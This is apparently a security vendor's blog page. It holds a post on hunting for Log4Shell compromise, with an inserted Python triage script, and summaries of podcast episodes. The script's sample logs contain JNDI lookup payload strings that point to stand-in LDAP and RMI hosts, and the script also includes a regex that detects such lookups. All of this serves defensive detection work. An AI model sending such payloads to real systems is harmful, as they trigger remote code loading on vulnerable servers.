Log4j 2: A Week Look Back

Original Entry by : Michael Morris

Do you know if you have been attacked?

By Michael Morris, Director of Global Business Development, Endace



Many organizations have spent this week scrambling to search their networks for any use of Log4j 2 libraries and to patch the applications, systems, appliances, and devices that might be using them. Many cycles are being spent contacting equipment and software vendors to determine whether their systems or applications are affected, and applying fixes and updates to prevent potential compromises. The primary response for most security teams has been to apply patches and plug the holes.

But what exactly is the threat? The Apache Log4j 2 Java library is vulnerable to a remote code execution vulnerability (CVE-2021-44228) known as Log4Shell. It gives remote, unauthenticated attackers the ability to execute arbitrary code, loaded from a malicious server, with the privileges of the process running Log4j 2.

It is nicely illustrated in this diagram from the Swiss Government Computer Emergency Response Team:

 

Log4J2 - JNDI attack process
(from: https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/)

Any system with this vulnerability is now an entry point for seeding or running remotely executed code, which could then carry out any number of other nefarious activities.

I have been reading numerous articles and attending various seminars from threat intel teams, such as Palo Alto Networks' Unit 42, that discuss the scale and severity of the risk this zero-day threat poses to organizations. There are several key takeaways I have learned.

First, because of the prevalence of this vulnerability, literally millions of systems are at risk. Second, because of the scale of attacks leveraging this vulnerability, there have already been several compromises and ransomware attacks. However, much of the threat actor activity to this point appears to be reconnaissance and the planting of additional malware that can be used later, once threat actors have obtained initial access to a network and the systems on it.

Our technology partner, Keysight Technologies, has been tracking honeypot activity which shows huge numbers of exploitation attempts – demonstrating how many threat actors are scanning the internet looking for vulnerable systems.

Industry-wide there are already a huge number of bots scanning the internet simply looking for openings. Key advice from threat intel teams is to immediately isolate any impacted servers as they are truly open backdoors to the rest of your infrastructure. There are numerous tools out there to scan your environment for Log4j 2 use.

Anywhere that Log4j 2 is found, you need to isolate the system and investigate it for any potential compromise. It’s essential to put in place policies, rules, and filter protections to monitor outbound traffic to unknown IP addresses. Apply filters and pay extra attention to common protocols like LDAP, LDAPS, RMI, and DNS, as these are the key protocols being leveraged for lateral movement and reconnaissance. If you are unable to isolate potentially compromised systems, look for anomalous or unexpected traffic to and from them.

Of course, you should also ensure your IDSs and firewalls have updated rule sets for Log4j 2 so that you can block or detect any future attempts to infect your network. This needs to be done quickly so you can get on with the job of reviewing any damage that may have been done.

If you’re collecting network metadata in a SIEM such as Splunk or Elastic, the first place to start looking is a search of all HTTP transactions for strings containing JNDI calls. Our partner, Splunk, published a blog on how to do this here:

https://www.splunk.com/en_us/blog/security/log4shell-detecting-log4j-vulnerability-cve-2021-44228-continued.html

Once you have identified any JNDI calls, it’s critical to review the recorded network packet data to determine if any outgoing connections were made from potentially compromised servers.

EndaceProbes can capture weeks or months of packet data, allowing you to quickly review potential threats that may have occurred prior to the public announcement of the Log4j 2 vulnerability. Chris Greer published a very useful YouTube video on how to use Wireshark to identify and analyze a Log4j 2 attack. Well worth watching.

Once you have identified connections that contain the JNDI string, you can quickly examine any subsequent outgoing connections from the affected host to see whether it successfully contacted the malicious LDAP server and downloaded Java malware. Knowing whether this step did or did not happen will save your team many days of incident response and allow them to focus on the servers that have actually been compromised.
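The two-step procedure the post lays out (search HTTP transactions for JNDI lookup strings, then check whether the host that received one made outbound LDAP, LDAPS, RMI or DNS connections afterwards) as a runnable first-pass triage script. This is an added example, not code from the Endace post or from the Splunk blog it links to; the two log formats, the sample log lines, the ten-minute correlation window and the list of suspect ports are all constructed assumptions.

```python
"""Added example (not from the Endace post): first-pass Log4Shell triage over
constructed HTTP transaction and connection logs.  Step 1 finds requests that
carry a JNDI lookup string; step 2 checks whether the receiving host then opened
an outbound connection, within a short window, either to the server named in the
lookup or to any external address on an LDAP/LDAPS/RMI/DNS port."""
import re
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

# Assumed log formats (constructed for this example):
#   HTTP_LOG: "<ISO timestamp> <receiving host> <field name> <field value>"
#   CONN_LOG: "<ISO timestamp> <src ip> <dst ip> <dst port> <proto>"
HTTP_LOG = [
    "2021-12-11T10:15:02Z 10.0.0.5 user-agent Mozilla/5.0",
    "2021-12-11T10:15:09Z 10.0.0.5 user-agent ${jndi:ldap://203.0.113.7:1389/a}",
    "2021-12-11T10:16:30Z 10.0.0.9 x-api-version ${JNDI:rmi://198.51.100.4:1099/x}",
    "2021-12-11T10:20:00Z 10.0.0.12 user-agent curl/7.79",
]
CONN_LOG = [
    "2021-12-11T10:15:10Z 10.0.0.5 203.0.113.7 1389 tcp",    # LDAP to the lookup server
    "2021-12-11T10:15:12Z 10.0.0.5 203.0.113.7 8080 tcp",    # follow-up fetch from same server
    "2021-12-11T10:16:31Z 10.0.0.9 10.0.0.53 53 udp",        # internal resolver only
    "2021-12-11T10:40:00Z 10.0.0.12 93.184.216.34 443 tcp",  # unrelated host
]

# Matches ${jndi:<scheme>://<host>[:<port>]...}, case-insensitive, tolerating
# whitespace around the separators.
JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(?P<scheme>ldaps?|rmi|dns)\s*:\s*//\s*"
    r"(?P<host>[^/:}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)
DEFAULT_PORTS = {"ldap": 389, "ldaps": 636, "rmi": 1099, "dns": 53}
# Assumed port list for the protocols the post names; 1389 is the unprivileged
# LDAP port used in the constructed sample.
SUSPECT_PORTS = {389, 636, 1099, 1389, 53}
# RFC 1918 and local ranges are listed explicitly: ipaddress.is_private would
# also treat the RFC 5737 documentation addresses used as stand-ins here as private.
INTERNAL_NETS = [ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def parse_ts(text):
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%SZ")


def parse_jndi(value):
    """Return scheme/host/port of a JNDI lookup in value, or None if absent."""
    m = JNDI_RE.search(value)
    if not m:
        return None
    scheme = m.group("scheme").lower()
    port = int(m.group("port")) if m.group("port") else DEFAULT_PORTS[scheme]
    return {"scheme": scheme, "host": m.group("host"), "port": port}


def find_jndi_requests(http_lines):
    """Step 1: every HTTP record whose field value carries a JNDI lookup."""
    hits = []
    for line in http_lines:
        ts, victim, field, value = line.split(" ", 3)
        lookup = parse_jndi(value)
        if lookup:
            hits.append({"ts": parse_ts(ts), "victim": victim, "field": field, **lookup})
    return hits


def is_external(ip):
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def find_callbacks(hits, conn_lines, window=timedelta(minutes=10)):
    """Step 2: outbound connections from a hit host, inside the window after the
    hit, to the lookup server or to an external LDAP/LDAPS/RMI/DNS port."""
    conns = []
    for line in conn_lines:
        ts, src, dst, port, proto = line.split()
        conns.append((parse_ts(ts), src, dst, int(port), proto))
    callbacks = {}
    for hit in hits:
        for ts, src, dst, port, proto in conns:
            if src != hit["victim"] or not (hit["ts"] <= ts <= hit["ts"] + window):
                continue
            if dst == hit["host"] or (is_external(dst) and port in SUSPECT_PORTS):
                callbacks.setdefault(hit["victim"], []).append((ts, dst, port, proto))
    return callbacks


def triage(http_lines, conn_lines):
    """Per host that received a JNDI string: did a callback follow or not?"""
    hits = find_jndi_requests(http_lines)
    callbacks = find_callbacks(hits, conn_lines)
    report = {}
    for hit in hits:
        status = "callback_observed" if hit["victim"] in callbacks else "jndi_seen_no_callback"
        report[hit["victim"]] = status
    return report


if __name__ == "__main__":
    for host, status in triage(HTTP_LOG, CONN_LOG).items():
        print(f"{host}: {status}")
```

A host reported as `callback_observed` is the one to isolate and treat as compromised first; `jndi_seen_no_callback` still needs a look, because a plain substring match on `${jndi:` is only a first pass and the absence of a logged connection in a short window is not proof that nothing happened. That is exactly where the recorded packet data the post describes earns its keep.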

Good luck with the Log4j 2 threat hunting! To learn more about how cost-effective and simple it can be to have an always-on network packet capture platform, integrated with the rest of your security tools, to help you search for Log4j 2 and other zero-day attacks, go to www.endace.com.


Endace Packet Forensics Files: Episode #29

Original Entry by : Michael Morris

Michael talks to Tim Dales, VP Labs and Analyst, IT Brand Pulse

By Michael Morris, Director of Global Business Development, Endace



What is the “Total Cost of Ownership” for security teams to get absolute forensics with full packet capture?

In this episode of the Endace Packet Forensic files, I talk with Tim Dales, VP of Labs and Analyst for IT Brand Pulse. Tim shares the results of an IT Brand Pulse study that examines the cost of in-house developed packet capture solutions versus off-the-shelf, vendor-built solutions.

Tim shares details of the report’s findings including the pros and cons and some of the key things many people don’t consider before trying to build solutions in-house.

Finally, Tim discusses key changes in how organizations are thinking about their security architectures and the gaps they are looking to address. He shares the importance of integrated workflows in helping analysts accelerate investigation times and confirm or dismiss potential indicators of compromise more definitively.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #23

Original Entry by : Michael Morris

Michael talks to Steve Tsirtsonis, Director EMEA Federal Business for Endace

By Michael Morris, Director of Global Business Development, Endace



Nation-state cybersecurity is fast becoming the new battle frontline in international conflict. It is complicated by rogue threat actor groups inserting their cyber weapons into the mix, extorting money for funding, fanning the flames of nation-state disputes, and crippling potential targets.

You won’t want to miss this episode of the Endace Packet Forensic files as I talk with Steve Tsirtsonis, Director EMEA Federal Business for Endace, who shares his view of the threat landscape that government agencies around the world are facing and how it is evolving.

Steve talks about what he sees governments doing to combat escalating cyber threats, what are some of the unique challenges they face and how they are evolving their security using SOAR, AI and NDR tools to be as prepared as possible to defend critical infrastructure.

Finally, Steve gives his thoughts on the key things security teams should look out for in the years ahead and what we can all learn from government security practices.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #18

Original Entry by : Michael Morris

Michael talks to Tim Dudman, Senior Principal Consultant, Riskaware

By Michael Morris, Director of Global Business Development, Endace



Interested in hearing what some of the UK’s leading government cyber defense experts are doing to address their biggest concerns and challenges?

Then don’t miss this insightful episode with Tim Dudman, Senior Principal Consultant for Riskaware, where he shares his experiences in collaborating with academia, industry, and UK Defense funding to generate leading-edge cybersecurity capabilities.

Tim talks about some of the gaps he sees across the industry and how AI and SOAR platforms are fitting in and complementing many security architectures.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #17

Original Entry by : Michael Morris

Michael talks to Jen Miller-Osborn, Deputy Director of Unit 42 at Palo Alto Networks

By Michael Morris, Director of Global Business Development, Endace



Want to hear about the latest attack trends, what to expect in the future and how best to prepare your defenses?

Then don’t miss this episode of our Packet Forensic Files series as Michael catches up with Jen Miller-Osborn from Unit 42 – the threat intelligence group at Palo Alto Networks.

Jen talks about some of the threat trends the team at Unit 42 has been seeing lately – including how ransomware attacks are becoming more sophisticated and targeted, how DDoS attacks are making a comeback, and what the recent SolarWinds “Sunburst” attacks have demonstrated.

She also provides some helpful tips for best practice cyber defense and talks about how the threat landscape might evolve over the next year or two.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #14

Original Entry by : Michael Morris

Michael talks to Brett White, Cybersecurity Architect and Advisor.

By Michael Morris, Director of Global Business Development, Endace



Looking for insights into how to improve your cybersecurity posture? You won’t want to miss our last episode of the Endace Packet Forensic Files for 2020. This episode features special guest Brett White, Cyber Security Advisor and Architect.

Brett has many years of experience at Juniper, Cisco and Palo Alto Networks architecting security solutions and advising clients on how to improve their security stacks and processes. He has also worked as both an in-house CISO and as a “CISO for hire”.

In this episode, Brett shares some recommended best practices for robust cybersecurity including the key foundational components of network-wide visibility and high-quality threat intelligence. He also highlights the importance of stepping back from focusing on technology alone and building a security strategy focused on your organization’s business goals, outcomes, and security imperatives.

Finally, Brett puts on his predictions hat and suggests three future areas of cybersecurity to keep an eye on to improve your overall security strategy.

Packet Forensics Files will be back after the Christmas and New Year period with our next installment. In the meantime, we wish you a happy and safe Christmas and New Year. Take care.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #9

Original Entry by : Michael Morris

Michael talks to Shamus McGillicuddy, VP of Research for Enterprise Management Associates

By Michael Morris, Director of Global Business Development, Endace



Want to hear the latest trends and challenges in the network performance management space?

Don’t miss our latest episode of the Endace Packet Forensic Files Vidcast/Podcast series with special guest Shamus McGillicuddy, VP of Research at Enterprise Management Associates (EMA).

Shamus is an industry-leading market research analyst with years of experience in the Network Operations space. He shares his insights on some of the biggest changes going on with NetOps teams and tools including the impact of the pandemic and the massive shift to remote workforces which is driving more complexity and creating performance challenges.

Shamus talks about the importance of both meta-data and full packet data in enabling NetOps teams to be faster and more accurate in solving network issues. Finally, he reveals some differentiators and trends in the monitoring of next-gen, software-defined networks and things to look out for over the next 18 months.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #8

Original Entry by : Michael Morris

Michael talks to Scott Register, VP of Security Solutions for KeySight Technologies

By Michael Morris, Director of Global Business Development, Endace



Catch our latest episode of “Secure Networks – the Packet Forensic Files” vidcast/podcast series with this week’s special guest Scott Register, VP of Security Solutions for KeySight Technologies.

Scott, with his years of experience in building security solutions, shares some of the biggest challenges SecOps teams are facing in today’s environment and what they are doing to solve them.

He talks about the latest trends in the threat landscape and what security teams are doing to test and monitor for these attacks.  Hear how threat simulation can help both validate tool readiness and people processes to elevate your security prevention and response.

Finally, Scott shares his insights into implementing security in 5G and WiFi infrastructures as well as traditional networks and data centers.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #7

Original Entry by : Michael Morris

Michael talks to Travis Rosiek, CTO and Strategy Officer at BluVector (a Comcast company)

By Michael Morris, Director of Global Business Development, Endace



If you haven’t caught up with the insights from our “Secure Networks – the Packet Forensics Files” vidcast/podcast series yet, here is your chance to see what you have been missing out on. This week’s special guest is Travis Rosiek, CTO and Strategy Officer for BluVector (a Comcast company).

Travis, a long-time government cybersecurity specialist, shares his insights into what he sees companies and government agencies are missing from their security strategies.  He talks about how you can begin to move your security activity from being merely reactive to a more proactive approach.

Travis discusses some of the specific challenges and advantages government agencies face compared to enterprises and what both groups can do to elevate their security posture.  He also shares his insights into best practices to protect your IT infrastructure and things to look out for in the ever-changing security landscape.

Other episodes in the Secure Networks video/audio podcast series are available here.


Endace Packet Forensics Files: Episode #6

Original Entry by : Michael Morris

Michael talks to Betty Dubois, Founder and CEO of Packet Detectives

By Michael Morris, Director of Global Business Development, Endace



Don’t miss the latest episode of our Endace Packet Forensic Files Vidcast/Podcast series with this week’s special guest Betty Dubois, CEO/Founder of Packet Detectives and renowned SharkFest speaker.

Betty talks about the challenges NetOps and SecOps teams are facing in today’s IT environment. She highlights best practices teams are adopting to adjust to today’s environments and shares her recommendations about how NetOps and SecOps teams can elevate their network investigation skills and processes.

Betty also gives some great tips on how to become a packet capture and Wireshark “power-user” and addresses some of the misconceptions about PCAP data.

Other episodes in the Secure Networks video/audio podcast series are available here.